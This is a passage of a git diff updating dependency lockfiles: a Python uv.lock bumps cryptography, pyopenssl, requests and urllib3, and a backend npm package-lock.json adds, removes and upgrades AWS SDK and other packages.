"https://files.pythonhosted.org/packages/50/46/cf71e26025c2e767c5609162c866a78e8a2915bbcfa408b7ca495c6140c4/cryptography-46.0.7-cp314-cp314t-manylinux_2_28_ppc64le.whl", hash = "sha256:fbfd0e5f273877695cb93baf14b185f4878128b250cc9f8e617ea0c025dfb022", size = 4905845, upload-time = "2026-04-08T01:56:50.916Z" }, + { url = "https://files.pythonhosted.org/packages/c0/ea/01276740375bac6249d0a971ebdf6b4dc9ead0ee0a34ef3b5a88c1a9b0d4/cryptography-46.0.7-cp314-cp314t-manylinux_2_28_x86_64.whl", hash = "sha256:ffca7aa1d00cf7d6469b988c581598f2259e46215e0140af408966a24cf086ce", size = 4444641, upload-time = "2026-04-08T01:56:52.882Z" }, + { url = 
"https://files.pythonhosted.org/packages/3d/4c/7d258f169ae71230f25d9f3d06caabcff8c3baf0978e2b7d65e0acac3827/cryptography-46.0.7-cp314-cp314t-manylinux_2_31_armv7l.whl", hash = "sha256:60627cf07e0d9274338521205899337c5d18249db56865f943cbe753aa96f40f", size = 3967749, upload-time = "2026-04-08T01:56:54.597Z" }, + { url = "https://files.pythonhosted.org/packages/b5/2a/2ea0767cad19e71b3530e4cad9605d0b5e338b6a1e72c37c9c1ceb86c333/cryptography-46.0.7-cp314-cp314t-manylinux_2_34_aarch64.whl", hash = "sha256:80406c3065e2c55d7f49a9550fe0c49b3f12e5bfff5dedb727e319e1afb9bf99", size = 4270942, upload-time = "2026-04-08T01:56:56.416Z" }, + { url = "https://files.pythonhosted.org/packages/41/3d/fe14df95a83319af25717677e956567a105bb6ab25641acaa093db79975d/cryptography-46.0.7-cp314-cp314t-manylinux_2_34_ppc64le.whl", hash = "sha256:c5b1ccd1239f48b7151a65bc6dd54bcfcc15e028c8ac126d3fada09db0e07ef1", size = 4871079, upload-time = "2026-04-08T01:56:58.31Z" }, + { url = "https://files.pythonhosted.org/packages/9c/59/4a479e0f36f8f378d397f4eab4c850b4ffb79a2f0d58704b8fa0703ddc11/cryptography-46.0.7-cp314-cp314t-manylinux_2_34_x86_64.whl", hash = "sha256:d5f7520159cd9c2154eb61eb67548ca05c5774d39e9c2c4339fd793fe7d097b2", size = 4443999, upload-time = "2026-04-08T01:57:00.508Z" }, + { url = "https://files.pythonhosted.org/packages/28/17/b59a741645822ec6d04732b43c5d35e4ef58be7bfa84a81e5ae6f05a1d33/cryptography-46.0.7-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:fcd8eac50d9138c1d7fc53a653ba60a2bee81a505f9f8850b6b2888555a45d0e", size = 4399191, upload-time = "2026-04-08T01:57:02.654Z" }, + { url = "https://files.pythonhosted.org/packages/59/6a/bb2e166d6d0e0955f1e9ff70f10ec4b2824c9cfcdb4da772c7dd69cc7d80/cryptography-46.0.7-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:65814c60f8cc400c63131584e3e1fad01235edba2614b61fbfbfa954082db0ee", size = 4655782, upload-time = "2026-04-08T01:57:04.592Z" }, + { url = 
"https://files.pythonhosted.org/packages/95/b6/3da51d48415bcb63b00dc17c2eff3a651b7c4fed484308d0f19b30e8cb2c/cryptography-46.0.7-cp314-cp314t-win32.whl", hash = "sha256:fdd1736fed309b4300346f88f74cd120c27c56852c3838cab416e7a166f67298", size = 3002227, upload-time = "2026-04-08T01:57:06.91Z" }, + { url = "https://files.pythonhosted.org/packages/32/a8/9f0e4ed57ec9cebe506e58db11ae472972ecb0c659e4d52bbaee80ca340a/cryptography-46.0.7-cp314-cp314t-win_amd64.whl", hash = "sha256:e06acf3c99be55aa3b516397fe42f5855597f430add9c17fa46bf2e0fb34c9bb", size = 3475332, upload-time = "2026-04-08T01:57:08.807Z" }, + { url = "https://files.pythonhosted.org/packages/a7/7f/cd42fc3614386bc0c12f0cb3c4ae1fc2bbca5c9662dfed031514911d513d/cryptography-46.0.7-cp38-abi3-macosx_10_9_universal2.whl", hash = "sha256:462ad5cb1c148a22b2e3bcc5ad52504dff325d17daf5df8d88c17dda1f75f2a4", size = 7165618, upload-time = "2026-04-08T01:57:10.645Z" }, + { url = "https://files.pythonhosted.org/packages/a5/d0/36a49f0262d2319139d2829f773f1b97ef8aef7f97e6e5bd21455e5a8fb5/cryptography-46.0.7-cp38-abi3-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:84d4cced91f0f159a7ddacad249cc077e63195c36aac40b4150e7a57e84fffe7", size = 4270628, upload-time = "2026-04-08T01:57:12.885Z" }, + { url = "https://files.pythonhosted.org/packages/8a/6c/1a42450f464dda6ffbe578a911f773e54dd48c10f9895a23a7e88b3e7db5/cryptography-46.0.7-cp38-abi3-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:128c5edfe5e5938b86b03941e94fac9ee793a94452ad1365c9fc3f4f62216832", size = 4415405, upload-time = "2026-04-08T01:57:14.923Z" }, + { url = "https://files.pythonhosted.org/packages/9a/92/4ed714dbe93a066dc1f4b4581a464d2d7dbec9046f7c8b7016f5286329e2/cryptography-46.0.7-cp38-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:5e51be372b26ef4ba3de3c167cd3d1022934bc838ae9eaad7e644986d2a3d163", size = 4272715, upload-time = "2026-04-08T01:57:16.638Z" }, + { url = 
"https://files.pythonhosted.org/packages/b7/e6/a26b84096eddd51494bba19111f8fffe976f6a09f132706f8f1bf03f51f7/cryptography-46.0.7-cp38-abi3-manylinux_2_28_ppc64le.whl", hash = "sha256:cdf1a610ef82abb396451862739e3fc93b071c844399e15b90726ef7470eeaf2", size = 4918400, upload-time = "2026-04-08T01:57:19.021Z" }, + { url = "https://files.pythonhosted.org/packages/c7/08/ffd537b605568a148543ac3c2b239708ae0bd635064bab41359252ef88ed/cryptography-46.0.7-cp38-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:1d25aee46d0c6f1a501adcddb2d2fee4b979381346a78558ed13e50aa8a59067", size = 4450634, upload-time = "2026-04-08T01:57:21.185Z" }, + { url = "https://files.pythonhosted.org/packages/16/01/0cd51dd86ab5b9befe0d031e276510491976c3a80e9f6e31810cce46c4ad/cryptography-46.0.7-cp38-abi3-manylinux_2_31_armv7l.whl", hash = "sha256:cdfbe22376065ffcf8be74dc9a909f032df19bc58a699456a21712d6e5eabfd0", size = 3985233, upload-time = "2026-04-08T01:57:22.862Z" }, + { url = "https://files.pythonhosted.org/packages/92/49/819d6ed3a7d9349c2939f81b500a738cb733ab62fbecdbc1e38e83d45e12/cryptography-46.0.7-cp38-abi3-manylinux_2_34_aarch64.whl", hash = "sha256:abad9dac36cbf55de6eb49badd4016806b3165d396f64925bf2999bcb67837ba", size = 4271955, upload-time = "2026-04-08T01:57:24.814Z" }, + { url = "https://files.pythonhosted.org/packages/80/07/ad9b3c56ebb95ed2473d46df0847357e01583f4c52a85754d1a55e29e4d0/cryptography-46.0.7-cp38-abi3-manylinux_2_34_ppc64le.whl", hash = "sha256:935ce7e3cfdb53e3536119a542b839bb94ec1ad081013e9ab9b7cfd478b05006", size = 4879888, upload-time = "2026-04-08T01:57:26.88Z" }, + { url = "https://files.pythonhosted.org/packages/b8/c7/201d3d58f30c4c2bdbe9b03844c291feb77c20511cc3586daf7edc12a47b/cryptography-46.0.7-cp38-abi3-manylinux_2_34_x86_64.whl", hash = "sha256:35719dc79d4730d30f1c2b6474bd6acda36ae2dfae1e3c16f2051f215df33ce0", size = 4449961, upload-time = "2026-04-08T01:57:29.068Z" }, + { url = 
"https://files.pythonhosted.org/packages/a5/ef/649750cbf96f3033c3c976e112265c33906f8e462291a33d77f90356548c/cryptography-46.0.7-cp38-abi3-musllinux_1_2_aarch64.whl", hash = "sha256:7bbc6ccf49d05ac8f7d7b5e2e2c33830d4fe2061def88210a126d130d7f71a85", size = 4401696, upload-time = "2026-04-08T01:57:31.029Z" }, + { url = "https://files.pythonhosted.org/packages/41/52/a8908dcb1a389a459a29008c29966c1d552588d4ae6d43f3a1a4512e0ebe/cryptography-46.0.7-cp38-abi3-musllinux_1_2_x86_64.whl", hash = "sha256:a1529d614f44b863a7b480c6d000fe93b59acee9c82ffa027cfadc77521a9f5e", size = 4664256, upload-time = "2026-04-08T01:57:33.144Z" }, + { url = "https://files.pythonhosted.org/packages/4b/fa/f0ab06238e899cc3fb332623f337a7364f36f4bb3f2534c2bb95a35b132c/cryptography-46.0.7-cp38-abi3-win32.whl", hash = "sha256:f247c8c1a1fb45e12586afbb436ef21ff1e80670b2861a90353d9b025583d246", size = 3013001, upload-time = "2026-04-08T01:57:34.933Z" }, + { url = "https://files.pythonhosted.org/packages/d2/f1/00ce3bde3ca542d1acd8f8cfa38e446840945aa6363f9b74746394b14127/cryptography-46.0.7-cp38-abi3-win_amd64.whl", hash = "sha256:506c4ff91eff4f82bdac7633318a526b1d1309fc07ca76a3ad182cb5b686d6d3", size = 3472985, upload-time = "2026-04-08T01:57:36.714Z" }, ] [[package]] @@ -470,15 +467,15 @@ wheels = [ [[package]] name = "pyopenssl" -version = "25.3.0" +version = "26.0.0" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "cryptography" }, { name = "typing-extensions", marker = "python_full_version < '3.13'" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/80/be/97b83a464498a79103036bc74d1038df4a7ef0e402cfaf4d5e113fb14759/pyopenssl-25.3.0.tar.gz", hash = "sha256:c981cb0a3fd84e8602d7afc209522773b94c1c2446a3c710a75b06fe1beae329", size = 184073, upload-time = "2025-09-17T00:32:21.037Z" } +sdist = { url = "https://files.pythonhosted.org/packages/8e/11/a62e1d33b373da2b2c2cd9eb508147871c80f12b1cacde3c5d314922afdd/pyopenssl-26.0.0.tar.gz", hash = 
"sha256:f293934e52936f2e3413b89c6ce36df66a0b34ae1ea3a053b8c5020ff2f513fc", size = 185534, upload-time = "2026-03-15T14:28:26.353Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/d1/81/ef2b1dfd1862567d573a4fdbc9f969067621764fbb74338496840a1d2977/pyopenssl-25.3.0-py3-none-any.whl", hash = "sha256:1fda6fc034d5e3d179d39e59c1895c9faeaf40a79de5fc4cbbfbe0d36f4a77b6", size = 57268, upload-time = "2025-09-17T00:32:19.474Z" }, + { url = "https://files.pythonhosted.org/packages/fb/7d/d4f7d908fa8415571771b30669251d57c3cf313b36a856e6d7548ae01619/pyopenssl-26.0.0-py3-none-any.whl", hash = "sha256:df94d28498848b98cc1c0ffb8ef1e71e40210d3b0a8064c9d29571ed2904bf81", size = 57969, upload-time = "2026-03-15T14:28:24.864Z" }, ] [[package]] @@ -501,7 +498,7 @@ wheels = [ [[package]] name = "requests" -version = "2.32.5" +version = "2.33.1" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "certifi" }, @@ -509,9 +506,9 @@ dependencies = [ { name = "idna" }, { name = "urllib3" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/c9/74/b3ff8e6c8446842c3f5c837e9c3dfcfe2018ea6ecef224c710c85ef728f4/requests-2.32.5.tar.gz", hash = "sha256:dbba0bac56e100853db0ea71b82b4dfd5fe2bf6d3754a8893c3af500cec7d7cf", size = 134517, upload-time = "2025-08-18T20:46:02.573Z" } +sdist = { url = "https://files.pythonhosted.org/packages/5f/a4/98b9c7c6428a668bf7e42ebb7c79d576a1c3c1e3ae2d47e674b468388871/requests-2.33.1.tar.gz", hash = "sha256:18817f8c57c6263968bc123d237e3b8b08ac046f5456bd1e307ee8f4250d3517", size = 134120, upload-time = "2026-03-30T16:09:15.531Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/1e/db/4254e3eabe8020b458f1a747140d32277ec7a271daf1d235b70dc0b4e6e3/requests-2.32.5-py3-none-any.whl", hash = "sha256:2462f94637a34fd532264295e186976db0f5d453d1cdd31473c85a6a161affb6", size = 64738, upload-time = "2025-08-18T20:46:00.542Z" }, + { url = 
"https://files.pythonhosted.org/packages/d7/8e/7540e8a2036f79a125c1d2ebadf69ed7901608859186c856fa0388ef4197/requests-2.33.1-py3-none-any.whl", hash = "sha256:4e6d1ef462f3626a1f0a0a9c42dd93c63bad33f9f1c1937509b8c5c8718ab56a", size = 64947, upload-time = "2026-03-30T16:09:13.83Z" }, ] [[package]] @@ -552,9 +549,9 @@ wheels = [ [[package]] name = "urllib3" -version = "2.5.0" +version = "2.6.3" source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/15/22/9ee70a2574a4f4599c47dd506532914ce044817c7752a79b6a51286319bc/urllib3-2.5.0.tar.gz", hash = "sha256:3fc47733c7e419d4bc3f6b3dc2b4f890bb743906a30d56ba4a5bfa4bbff92760", size = 393185, upload-time = "2025-06-18T14:07:41.644Z" } +sdist = { url = "https://files.pythonhosted.org/packages/c7/24/5f1b3bdffd70275f6661c76461e25f024d5a38a46f04aaca912426a2b1d3/urllib3-2.6.3.tar.gz", hash = "sha256:1b62b6884944a57dbe321509ab94fd4d3b307075e0c2eae991ac71ee15ad38ed", size = 435556, upload-time = "2026-01-07T16:24:43.925Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/a7/c2/fe1e52489ae3122415c51f387e221dd0773709bad6c6cdaa599e8a2c5185/urllib3-2.5.0-py3-none-any.whl", hash = "sha256:e6b01673c0fa6a13e374b50871808eb3bf7046c4b125b216f6bf1cc604cff0dc", size = 129795, upload-time = "2025-06-18T14:07:40.39Z" }, + { url = "https://files.pythonhosted.org/packages/39/08/aaaad47bc4e9dc8c725e68f9d04865dbcb2052843ff09c97b08904852d84/urllib3-2.6.3-py3-none-any.whl", hash = "sha256:bf272323e553dfb2e87d9bfd225ca7b0f467b919d7bbd355436d3fd37cb0acd4", size = 131584, upload-time = "2026-01-07T16:24:42.685Z" }, ] diff --git a/backend/package-lock.json b/backend/package-lock.json index 56ed467259c..6c0db7c3751 100644 --- a/backend/package-lock.json +++ b/backend/package-lock.json @@ -10,12 +10,15 @@ "license": "ISC", "dependencies": { "@ai-sdk/anthropic": "^3.0.68", + "@aws-sdk/client-acm": "^3.1030.0", "@aws-sdk/client-acm-pca": "^3.992.0", + "@aws-sdk/client-elastic-load-balancing-v2": 
"^3.1015.0", "@aws-sdk/client-elasticache": "^3.637.0", "@aws-sdk/client-iam": "^3.525.0", "@aws-sdk/client-kms": "^3.609.0", "@aws-sdk/client-route-53": "^3.810.0", "@aws-sdk/client-secrets-manager": "^3.504.0", + "@aws-sdk/client-ssm": "^3.1015.0", "@aws-sdk/client-sts": "^3.600.0", "@casl/ability": "^6.5.0", "@clickhouse/client": "^1.17.0", @@ -36,7 +39,7 @@ "@fastify/swagger-ui": "^3.1.0", "@fastify/websocket": "^10.0.1", "@gitbeaker/rest": "^42.5.0", - "@google-cloud/kms": "^4.5.0", + "@google-cloud/kms": "^5.4.0", "@infisical/ldapjs": "3.0.11", "@infisical/pg-view-generator": "^1.1.0", "@infisical/quic": "^1.0.8", @@ -46,7 +49,6 @@ "@octokit/core": "^5.2.1", "@octokit/plugin-paginate-graphql": "^4.0.1", "@octokit/plugin-retry": "^5.0.5", - "@octokit/request": "8.4.1", "@octokit/rest": "^20.0.2", "@octokit/webhooks-types": "^7.3.1", "@octopusdeploy/api-client": "^3.4.1", @@ -58,12 +60,9 @@ "@opentelemetry/resources": "^1.28.0", "@opentelemetry/sdk-metrics": "^1.28.0", "@opentelemetry/semantic-conventions": "^1.27.0", - "@peculiar/asn1-cms": "^2.6.1", - "@peculiar/asn1-pkcs9": "^2.6.1", "@peculiar/asn1-schema": "^2.3.8", "@peculiar/x509": "^1.12.1", "@react-email/components": "^1.0.1", - "@serdnam/pino-cloudwatch-transport": "^1.0.4", "@simplewebauthn/server": "^13.2.2", "@sindresorhus/slugify": "1.1.0", "@slack/oauth": "^3.0.2", @@ -72,11 +71,9 @@ "@ucast/mongo2js": "^1.3.4", "acme-client": "^5.4.0", "ai": "^6.0.154", - "ajv": "^8.12.0", "argon2": "^0.31.2", "asn1js": "^3.0.6", - "aws-sdk": "^2.1553.0", - "axios": "^1.12.0", + "axios": "^1.15.0", "axios-ntlm": "^1.4.4", "axios-retry": "^4.0.0", "bcrypt": "^5.1.1", @@ -96,9 +93,7 @@ "hdb": "^0.19.10", "ioredis": "^5.3.2", "isomorphic-dompurify": "^2.22.0", - "jmespath": "^0.16.0", "jose": "^6.1.0", - "js-yaml": "^4.1.0", "jsonwebtoken": "^9.0.2", "jsrp": "^0.2.4", "jwks-rsa": "^3.1.0", @@ -114,7 +109,7 @@ "nanoid": "^3.3.8", "netmask": "^2.0.2", "node-forge": "^1.3.2", - "nodemailer": "^7.0.12", + "nodemailer": 
"^8.0.5", "oci-common": "^2.108.0", "oci-identity": "^2.108.0", "oci-keymanagement": "^2.108.0", @@ -167,8 +162,6 @@ "@smithy/types": "^4.3.1", "@types/bcrypt": "^5.0.2", "@types/dns-packet": "^5.6.5", - "@types/jmespath": "^0.15.2", - "@types/js-yaml": "^4.0.9", "@types/jsonwebtoken": "^9.0.5", "@types/jsrp": "^0.2.6", "@types/libsodium-wrappers": "^0.7.13", @@ -201,11 +194,9 @@ "eslint-plugin-simple-import-sort": "^10.0.0", "nock": "^14.0.10", "nodemon": "^3.0.2", - "ora": "^7.0.1", "pino-pretty": "^10.2.3", "prompt-sync": "^4.2.0", "react-email": "^5.0.6", - "rimraf": "^5.0.5", "ts-node": "^10.9.2", "tsc-alias": "^1.8.8", "tsconfig-paths": "^4.2.0", @@ -521,6 +512,57 @@ "node": ">=14.0.0" } }, + "node_modules/@aws-sdk/client-acm": { + "version": "3.1031.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-acm/-/client-acm-3.1031.0.tgz", + "integrity": "sha512-QJxeg+GsXlAVdgiNgUb0pSUhoLP4x8S4VPFLGmimJx212/kfbNwBH+T7r5os09KR8U5gBAe2U8VLJhyF8dUl7w==", + "license": "Apache-2.0", + "dependencies": { + "@aws-crypto/sha256-browser": "5.2.0", + "@aws-crypto/sha256-js": "5.2.0", + "@aws-sdk/core": "^3.974.0", + "@aws-sdk/credential-provider-node": "^3.972.31", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.30", + "@aws-sdk/region-config-resolver": "^3.972.12", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.7", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.16", + "@smithy/config-resolver": "^4.4.16", + "@smithy/core": "^3.23.15", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + "@smithy/middleware-endpoint": "^4.4.30", + "@smithy/middleware-retry": "^4.5.3", + "@smithy/middleware-serde": "^4.2.18", + 
"@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": "^4.5.3", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.11", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-base64": "^4.3.2", + "@smithy/util-body-length-browser": "^4.2.2", + "@smithy/util-body-length-node": "^4.2.3", + "@smithy/util-defaults-mode-browser": "^4.3.47", + "@smithy/util-defaults-mode-node": "^4.2.52", + "@smithy/util-endpoints": "^3.4.1", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.2", + "@smithy/util-utf8": "^4.2.2", + "@smithy/util-waiter": "^4.2.16", + "tslib": "^2.6.2" + }, + "engines": { + "node": ">=20.0.0" + } + }, "node_modules/@aws-sdk/client-acm-pca": { "version": "3.992.0", "resolved": "https://registry.npmjs.org/@aws-sdk/client-acm-pca/-/client-acm-pca-3.992.0.tgz", @@ -588,53 +630,51 @@ "node": ">=20.0.0" } }, - "node_modules/@aws-sdk/client-cloudwatch-logs": { - "version": "3.1020.0", - "resolved": "https://registry.npmjs.org/@aws-sdk/client-cloudwatch-logs/-/client-cloudwatch-logs-3.1020.0.tgz", - "integrity": "sha512-ezS+wZbSJYbncXtfO0BOyNdqeRnKPSRPZNq111aydoZoW0Q/FnTiRbISZoMLqOCnwJVOX3EZMGNGpUvVyJ+CGQ==", + "node_modules/@aws-sdk/client-elastic-load-balancing-v2": { + "version": "3.1037.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-elastic-load-balancing-v2/-/client-elastic-load-balancing-v2-3.1037.0.tgz", + "integrity": "sha512-GwlGNTz8IrsJuAx8e50jzzMj3JPAHaMFupXsJoSjvb44p7UDS+Qr4NgSV7AkJ6KH9KMiWf3zlWFpAN9VoHbS9w==", "license": "Apache-2.0", "dependencies": { "@aws-crypto/sha256-browser": "5.2.0", "@aws-crypto/sha256-js": "5.2.0", - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/credential-provider-node": "^3.972.28", - "@aws-sdk/middleware-host-header": "^3.972.8", - "@aws-sdk/middleware-logger": "^3.972.8", - "@aws-sdk/middleware-recursion-detection": "^3.972.9", - "@aws-sdk/middleware-user-agent": "^3.972.27", - 
"@aws-sdk/region-config-resolver": "^3.972.10", - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/util-endpoints": "^3.996.5", - "@aws-sdk/util-user-agent-browser": "^3.972.8", - "@aws-sdk/util-user-agent-node": "^3.973.13", - "@smithy/config-resolver": "^4.4.13", - "@smithy/core": "^3.23.13", - "@smithy/eventstream-serde-browser": "^4.2.12", - "@smithy/eventstream-serde-config-resolver": "^4.3.12", - "@smithy/eventstream-serde-node": "^4.2.12", - "@smithy/fetch-http-handler": "^5.3.15", - "@smithy/hash-node": "^4.2.12", - "@smithy/invalid-dependency": "^4.2.12", - "@smithy/middleware-content-length": "^4.2.12", - "@smithy/middleware-endpoint": "^4.4.28", - "@smithy/middleware-retry": "^4.4.45", - "@smithy/middleware-serde": "^4.2.16", - "@smithy/middleware-stack": "^4.2.12", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/node-http-handler": "^4.5.1", - "@smithy/protocol-http": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/credential-provider-node": "^3.972.36", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/region-config-resolver": "^3.972.13", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.21", + "@smithy/config-resolver": "^4.4.17", + "@smithy/core": "^3.23.17", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + "@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-retry": "^4.5.5", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": 
"^4.6.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", "@smithy/util-body-length-node": "^4.2.3", - "@smithy/util-defaults-mode-browser": "^4.3.44", - "@smithy/util-defaults-mode-node": "^4.2.48", - "@smithy/util-endpoints": "^3.3.3", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-retry": "^4.2.12", + "@smithy/util-defaults-mode-browser": "^4.3.49", + "@smithy/util-defaults-mode-node": "^4.2.54", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", "@smithy/util-utf8": "^4.2.2", + "@smithy/util-waiter": "^4.2.16", "tslib": "^2.6.2" }, "engines": { @@ -1013,6 +1053,57 @@ "node": ">=20.0.0" } }, + "node_modules/@aws-sdk/client-ssm": { + "version": "3.1037.0", + "resolved": "https://registry.npmjs.org/@aws-sdk/client-ssm/-/client-ssm-3.1037.0.tgz", + "integrity": "sha512-bpOon1QQ+FN1yH7NbjjHnyQ7y5xPvS/3vS2nL3+e2+Iu9sA+WJwgwquk6N+U1EtnAuGPAl9eNzk0GnEHaIwAOQ==", + "license": "Apache-2.0", + "dependencies": { + "@aws-crypto/sha256-browser": "5.2.0", + "@aws-crypto/sha256-js": "5.2.0", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/credential-provider-node": "^3.972.36", + "@aws-sdk/middleware-host-header": "^3.972.10", + "@aws-sdk/middleware-logger": "^3.972.10", + "@aws-sdk/middleware-recursion-detection": "^3.972.11", + "@aws-sdk/middleware-user-agent": "^3.972.35", + "@aws-sdk/region-config-resolver": "^3.972.13", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/util-endpoints": "^3.996.8", + "@aws-sdk/util-user-agent-browser": "^3.972.10", + "@aws-sdk/util-user-agent-node": "^3.973.21", + "@smithy/config-resolver": "^4.4.17", + "@smithy/core": "^3.23.17", + "@smithy/fetch-http-handler": "^5.3.17", + "@smithy/hash-node": "^4.2.14", + "@smithy/invalid-dependency": "^4.2.14", + "@smithy/middleware-content-length": "^4.2.14", + 
"@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-retry": "^4.5.5", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/node-http-handler": "^4.6.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-base64": "^4.3.2", + "@smithy/util-body-length-browser": "^4.2.2", + "@smithy/util-body-length-node": "^4.2.3", + "@smithy/util-defaults-mode-browser": "^4.3.49", + "@smithy/util-defaults-mode-node": "^4.2.54", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", + "@smithy/util-utf8": "^4.2.2", + "@smithy/util-waiter": "^4.2.16", + "tslib": "^2.6.2" + }, + "engines": { + "node": ">=20.0.0" + } + }, "node_modules/@aws-sdk/client-sts": { "version": "3.1020.0", "resolved": "https://registry.npmjs.org/@aws-sdk/client-sts/-/client-sts-3.1020.0.tgz", @@ -1064,22 +1155,23 @@ } }, "node_modules/@aws-sdk/core": { - "version": "3.973.26", - "resolved": "https://registry.npmjs.org/@aws-sdk/core/-/core-3.973.26.tgz", - "integrity": "sha512-A/E6n2W42ruU+sfWk+mMUOyVXbsSgGrY3MJ9/0Az5qUdG67y8I6HYzzoAa+e/lzxxl1uCYmEL6BTMi9ZiZnplQ==", + "version": "3.974.5", + "resolved": "https://registry.npmjs.org/@aws-sdk/core/-/core-3.974.5.tgz", + "integrity": "sha512-lMPlYlYfQdNZhlkJgnkmESwrY+hNh3PljmZ+37oAqLNdJ6rnILAwFSyc6B3bJeDOtMORNnMQIej0aTRuOlDyhQ==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/types": "^3.973.6", - "@aws-sdk/xml-builder": "^3.972.16", - "@smithy/core": "^3.23.13", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/signature-v4": "^5.3.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", + "@aws-sdk/types": "^3.973.8", + "@aws-sdk/xml-builder": "^3.972.19", + "@smithy/core": "^3.23.17", + 
"@smithy/node-config-provider": "^4.3.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/signature-v4": "^5.3.14", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", - "@smithy/util-middleware": "^4.2.12", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.4", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" }, @@ -1101,15 +1193,15 @@ } }, "node_modules/@aws-sdk/credential-provider-env": { - "version": "3.972.24", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-env/-/credential-provider-env-3.972.24.tgz", - "integrity": "sha512-FWg8uFmT6vQM7VuzELzwVo5bzExGaKHdubn0StjgrcU5FvuLExUe+k06kn/40uKv59rYzhez8eFNM4yYE/Yb/w==", + "version": "3.972.31", + "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-env/-/credential-provider-env-3.972.31.tgz", + "integrity": "sha512-X/yGB73LmDW/6MdDJGCDzZBUXnM3ys4vs9l+5ZTJmiEswDdP1OjeoAFlFjVGS9o4KB2wZWQ9KOfdVNSSK6Ep3w==", "license": "Apache-2.0", "dependencies": { - "@aws-sdk/core": "^3.973.26", - "@aws-sdk/types": "^3.973.6", - "@smithy/property-provider": "^4.2.12", - "@smithy/types": "^4.13.1", + "@aws-sdk/core": "^3.974.5", + "@aws-sdk/types": "^3.973.8", + "@smithy/property-provider": "^4.2.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -1117,20 +1209,20 @@ } }, "node_modules/@aws-sdk/credential-provider-http": { - "version": "3.972.26", - "resolved": "https://registry.npmjs.org/@aws-sdk/credential-provider-http/-/credential-provider-http-3.972.26.tgz", - "integrity": 